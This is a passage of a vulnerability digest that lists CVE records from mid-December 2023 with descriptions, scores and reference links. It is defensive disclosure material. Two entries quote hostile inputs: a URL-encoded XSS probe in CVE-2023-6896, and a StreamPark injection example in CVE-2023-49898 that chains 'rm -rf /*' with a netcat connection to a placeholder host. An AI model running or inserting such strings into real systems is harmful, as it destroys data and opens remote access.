Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Source : hcl.com

Vulnerability ID : CVE-2023-28022

First published on : 15-12-2023 23:15:07
Last modified on : 18-12-2023 14:05:33

Description :
HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.

CVE ID : CVE-2023-28022
Source : psirt@hcl.com
CVSS Score : 3.5

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108433 | source : psirt@hcl.com


Source : vuldb.com

Vulnerability ID : CVE-2023-6896

First published on : 17-12-2023 10:15:08
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.

CVE ID : CVE-2023-6896
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://vuldb.com/?ctiid.248255 | source : cna@vuldb.com
https://vuldb.com/?id.248255 | source : cna@vuldb.com
https://www.yuque.com/u39434519/pfhiwd/vry762ncuczem3yi?singleDoc# | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6908

First published on : 18-12-2023 04:15:52
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.

CVE ID : CVE-2023-6908
Source : cna@vuldb.com
CVSS Score : 3.1

References :
https://github.com/DFIRKuiper/Kuiper/commit/94fa135153002f651f5526c55a7240e083db8d73 | source : cna@vuldb.com
https://github.com/DFIRKuiper/Kuiper/pull/106 | source : cna@vuldb.com
https://github.com/DFIRKuiper/Kuiper/releases/tag/v2.3.5 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248277 | source : cna@vuldb.com
https://vuldb.com/?id.248277 | source : cna@vuldb.com

Vulnerability : CWE-22


Source : gallagher.com

Vulnerability ID : CVE-2023-22439

First published on : 18-12-2023 22:15:07
Last modified on : 18-12-2023 22:15:07

Description :
Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.

CVE ID : CVE-2023-22439
Source : disclosures@gallagher.com
CVSS Score : 3.1

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-22439 | source : disclosures@gallagher.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-41967

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier.

CVE ID : CVE-2023-41967
Source : disclosures@gallagher.com
CVSS Score : 2.4

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-41967 | source : disclosures@gallagher.com

Vulnerability : CWE-1272


Source : gitlab.com

Vulnerability ID : CVE-2023-3511

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of.

CVE ID : CVE-2023-3511
Source : cve@gitlab.com
CVSS Score : 2.0

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/416961 | source : cve@gitlab.com
https://hackerone.com/reports/2046752 | source : cve@gitlab.com

Vulnerability : CWE-284


(44) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-48049

First published on : 15-12-2023 00:15:42
Last modified on : 15-12-2023 13:42:13

Description :
A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component.

CVE ID : CVE-2023-48049
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/luvsn/OdZoo/tree/main/exploits/website_search_blog | source : cve@mitre.org


Vulnerability ID : CVE-2023-40954

First published on : 15-12-2023 01:15:07
Last modified on : 15-12-2023 13:42:13

Description :
A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component.

CVE ID : CVE-2023-40954
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gmarczynski/odoo-web-progress/commit/3c867f1cf7447449c81b1aa24ebb1f7ae757489f | source : cve@mitre.org
https://github.com/luvsn/OdZoo/tree/main/exploits/web_progress | source : cve@mitre.org


Vulnerability ID : CVE-2023-42183

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.

CVE ID : CVE-2023-42183
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/lockss/lockss-daemon/security/advisories/GHSA-mgqj-hphf-9588 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48050

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.

CVE ID : CVE-2023-48050
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/luvsn/OdZoo/tree/main/exploits/odoo-biometric-attendance | source : cve@mitre.org


Vulnerability ID : CVE-2023-50089

First published on : 15-12-2023 17:15:12
Last modified on : 15-12-2023 20:09:58

Description :
A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.

CVE ID : CVE-2023-50089
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/NoneShell/Vulnerabilities/blob/main/NETGEAR/WNR2000v4-1.0.0.70-Authorized-Command-Injection.md | source : cve@mitre.org
https://www.netgear.com/about/security/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-50917

First published on : 15-12-2023 17:15:12
Last modified on : 15-12-2023 20:09:58

Description :
MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.

CVE ID : CVE-2023-50917
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178 | source : cve@mitre.org
https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac | source : cve@mitre.org


Vulnerability ID : CVE-2023-50918

First published on : 15-12-2023 18:15:07
Last modified on : 15-12-2023 20:09:58

Description :
app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.

CVE ID : CVE-2023-50918
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/MISP/MISP/commit/92888b1376246c0f20c256aaa3c57b6f12115fa1 | source : cve@mitre.org
https://github.com/MISP/MISP/compare/v2.4.181...v2.4.182 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50469

First published on : 15-12-2023 21:15:09
Last modified on : 18-12-2023 14:05:33

Description :
Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi.

CVE ID : CVE-2023-50469
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/forever-more-cjy/overflow/blob/main/LBT-T310%20Buffer%20overflow.md | source : cve@mitre.org


Vulnerability ID : CVE-2020-17483

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An improper access control vulnerability exists in Uffizio's GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.

CVE ID : CVE-2020-17483
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2020-17484

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An Open Redirection vulnerability exists in Uffizio's GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.

CVE ID : CVE-2020-17484
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2020-17485

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
A Remote Code Execution vulnerability exist in Uffizio's GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources

CVE ID : CVE-2020-17485
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2021-42796

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed.

CVE ID : CVE-2021-42796
Source : cve@mitre.org
CVSS Score : /

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org


Vulnerability ID : CVE-2021-42797

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources.

CVE ID : CVE-2021-42797
Source : cve@mitre.org
CVSS Score : /

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org


Vulnerability ID : CVE-2022-24351

First published on : 16-12-2023 02:15:07
Last modified on : 18-12-2023 14:05:33

Description :
TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.

CVE ID : CVE-2022-24351
Source : cve@mitre.org
CVSS Score : /

References :
https://www.insyde.com/security-pledge | source : cve@mitre.org
https://www.insyde.com/security-pledge/SA-2023038 | source : cve@mitre.org


Vulnerability ID : CVE-2023-31813

First published on : 16-12-2023 02:15:07
Last modified on : 16-12-2023 02:15:07

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-2804. Reason: This record is a duplicate of CVE-2023-2804. Notes: All CVE users should reference CVE-2023-2804 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.

CVE ID : CVE-2023-31813
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-50784

First published on : 16-12-2023 23:15:40
Last modified on : 18-12-2023 14:05:28

Description :
A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.

CVE ID : CVE-2023-50784
Source : cve@mitre.org
CVSS Score : /

References :
https://forums.unrealircd.org/viewtopic.php?t=9340 | source : cve@mitre.org
https://www.unrealircd.org/index/news | source : cve@mitre.org


Vulnerability ID : CVE-2023-50965

First published on : 17-12-2023 02:15:21
Last modified on : 18-12-2023 14:05:28

Description :
In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.

CVE ID : CVE-2023-50965
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/starnight/MicroHttpServer/issues/5 | source : cve@mitre.org
https://github.com/starnight/MicroHttpServer/tree/43985708ef5fe7677392c54e229bd22e136c2665 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50976

First published on : 18-12-2023 00:15:11
Last modified on : 18-12-2023 14:05:22

Description :
Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API.

CVE ID : CVE-2023-50976
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/redpanda-data/redpanda/compare/v23.1.20...v23.1.21 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/compare/v23.2.17...v23.2.18 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/issues/15048 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/pull/14969 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/pull/15060 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50979

First published on : 18-12-2023 04:15:50
Last modified on : 18-12-2023 14:05:22

Description :
Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding.

CVE ID : CVE-2023-50979
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1247 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50980

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:22

Description :
gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing.

CVE ID : CVE-2023-50980
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1248 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50981

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853.

CVE ID : CVE-2023-50981
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1249 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48795

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 21:15:08

Description :
The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, and libssh before 0.10.6; and there could be effects on Bitvise SSH through 9.31.

CVE ID : CVE-2023-48795
Source : cve@mitre.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/18/3 | source : cve@mitre.org
https://access.redhat.com/security/cve/cve-2023-48795 | source : cve@mitre.org
https://bugs.gentoo.org/920280 | source : cve@mitre.org
https://bugzilla.redhat.com/show_bug.cgi?id=2254210 | source : cve@mitre.org
https://bugzilla.suse.com/show_bug.cgi?id=1217950 | source : cve@mitre.org
https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10&id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6 | source : cve@mitre.org
https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0 | source : cve@mitre.org
https://github.com/advisories/GHSA-45x7-px36-x8w8 | source : cve@mitre.org
https://github.com/drakkan/sftpgo/releases/tag/v2.5.6 | source : cve@mitre.org
https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42 | source : cve@mitre.org
https://github.com/erlang/otp/releases/tag/OTP-26.2.1 | source : cve@mitre.org
https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d | source : cve@mitre.org
https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25 | source : cve@mitre.org
https://github.com/mwiede/jsch/issues/457 | source : cve@mitre.org
https://github.com/mwiede/jsch/pull/461 | source : cve@mitre.org
https://github.com/openssh/openssh-portable/commits/master | source : cve@mitre.org
https://github.com/paramiko/paramiko/issues/2337 | source : cve@mitre.org
https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst | source : cve@mitre.org
https://github.com/ronf/asyncssh/tags | source : cve@mitre.org
https://github.com/warp-tech/russh/releases/tag/v0.40.2 | source : cve@mitre.org
https://gitlab.com/libssh/libssh-mirror/-/tags | source : cve@mitre.org
https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ | source : cve@mitre.org
https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg | source : cve@mitre.org
https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/ | source : cve@mitre.org
https://matt.ucc.asn.au/dropbear/CHANGES | source : cve@mitre.org
https://news.ycombinator.com/item?id=38684904 | source : cve@mitre.org
https://news.ycombinator.com/item?id=38685286 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/CVE-2023-48795 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/source-package/libssh2 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg | source : cve@mitre.org
https://thorntech.com/cve-2023-48795-and-sftp-gateway/ | source : cve@mitre.org
https://twitter.com/TrueSkrillor/status/1736774389725565005 | source : cve@mitre.org
https://ubuntu.com/security/CVE-2023-48795 | source : cve@mitre.org
https://www.bitvise.com/ssh-server-version-history | source : cve@mitre.org
https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html | source : cve@mitre.org
https://www.openssh.com/openbsd.html | source : cve@mitre.org
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org
https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/ | source : cve@mitre.org
https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/ | source : cve@mitre.org
https://www.terrapin-attack.com | source : cve@mitre.org


Vulnerability ID : CVE-2023-51384

First published on : 18-12-2023 19:15:08
Last modified on : 18-12-2023 20:21:38

Description :
In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.

CVE ID : CVE-2023-51384
Source : cve@mitre.org
CVSS Score : /

References :
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org


Vulnerability ID : CVE-2023-51385

First published on : 18-12-2023 19:15:08
Last modified on : 18-12-2023 20:21:38

Description :
In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.

CVE ID : CVE-2023-51385
Source : cve@mitre.org
CVSS Score : /

References :
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org


Source : apache.org

Vulnerability ID : CVE-2023-29234

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.

CVE ID : CVE-2023-29234
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/15/2 | source : security@apache.org
https://lists.apache.org/thread/wb2df2whkdnbgp54nnqn0m94rllx8f77 | source : security@apache.org

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-46279

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.

CVE ID : CVE-2023-46279
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/15/3 | source : security@apache.org
https://lists.apache.org/thread/zw53nxrkrfswmk9n3sfwxmcj7x030nmo | source : security@apache.org

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-30867

First published on : 15-12-2023 13:15:07
Last modified on : 15-12-2023 13:41:51

Description :
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

CVE ID : CVE-2023-30867
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2 | source : security@apache.org

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49898

First published on : 15-12-2023 13:15:07
Last modified on : 15-12-2023 13:41:51

Description :
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

CVE ID : CVE-2023-49898
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3 | source : security@apache.org

Vulnerability : CWE-77


Vulnerability ID : CVE-2023-41314

First published on : 18-12-2023 09:15:05
Last modified on : 18-12-2023 14:05:17

Description :
The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues.

CVE ID : CVE-2023-41314
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/tgvpvz3yw7zgodl1sb3sv3jbbz8t5zb4 | source : security@apache.org

Vulnerability : CWE-863


Source : redhat.com

Vulnerability ID : CVE-2023-6920

First published on : 18-12-2023 17:15:11
Last modified on : 18-12-2023 17:15:11

Description :
Rejected reason: This flaw was found to be a duplicate of CVE-2023-6927. Please see https://access.redhat.com/security/cve/CVE-2023-6927 for information about affected products and security errata.

CVE ID : CVE-2023-6920
Source : secalert@redhat.com
CVSS Score : /

References :


Source : wpscan.com

Vulnerability ID : CVE-2023-4311

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.

CVE ID : CVE-2023-4311
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/21950116-1a69-4848-9da0-e912096c0fce | source : contact@wpscan.com


Vulnerability ID : CVE-2023-4724

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitise the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server

CVE ID : CVE-2023-4724
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/48820f1d-45cb-4f1f-990d-d132bfc5536f | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5005

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-5005
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/bfb174d4-7658-4883-a682-d06bda89ec44 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5348

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.

CVE ID : CVE-2023-5348
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/b37b09c1-1b53-471c-9b10-7d2d05ae11f1 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5882

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.

CVE ID : CVE-2023-5882
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/72be4b5c-21be-46af-a3f4-08b4c190a7e2 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5886

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.

CVE ID : CVE-2023-5886
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/0a08e49d-d34e-4140-a15d-ad64444665a3 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5949

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorised users from accessing password-protected posts' content.

CVE ID : CVE-2023-5949
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/3cec27ca-f470-402d-ae3e-271cb59cf407 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6065

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code

CVE ID : CVE-2023-6065
Source : contact@wpscan.com
CVSS Score : /

References :
https://drive.google.com/file/d/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf/view?usp=sharing | source : contact@wpscan.com
https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6077

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected

CVE ID : CVE-2023-6077
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6203

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request

CVE ID : CVE-2023-6203
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/229273e6-e849-447f-a95a-0730969ecdae | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6222

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
